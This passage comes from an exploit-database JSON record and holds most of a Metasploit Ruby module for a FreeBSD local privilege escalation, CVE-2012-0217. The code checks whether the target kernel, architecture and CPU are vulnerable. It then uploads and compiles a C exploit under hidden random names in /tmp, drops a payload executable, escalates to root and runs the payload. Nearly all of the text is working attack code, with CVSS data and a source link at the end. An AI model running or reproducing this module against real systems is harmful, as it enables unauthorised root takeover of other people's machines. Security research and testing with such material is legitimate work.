'DefaultTarget' => 0))\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data, gcc_args='')\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n chmod path\r\n end\r\n\r\n def exploit_data(file)\r\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file)\r\n end\r\n\r\n def is_root?\r\n (cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0')\r\n end\r\n\r\n def strip_comments(c_code)\r\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\r\n end\r\n\r\n def check\r\n kernel_release = cmd_exec('uname -r').to_s\r\n unless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/\r\n vprint_error \"FreeBSD version #{kernel_release} is not vulnerable\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n vprint_good \"FreeBSD version #{kernel_release} appears vulnerable\"\r\n\r\n arch = cmd_exec('uname -m').to_s\r\n unless arch.include? '64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n hw_model = cmd_exec('/sbin/sysctl hw.model').to_s\r\n unless hw_model.downcase.include? 'intel'\r\n vprint_error \"#{hw_model} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{hw_model} is vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload and compile exploit executable\r\n executable_name = \".#{rand_text_alphanumeric 5..10}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall'\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec executable_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n unless is_root?\r\n fail_with Failure::Unknown, 'Exploitation failed'\r\n end\r\n print_good \"Success! Executing payload...\"\r\n\r\n cmd_exec payload_path\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46508"}]}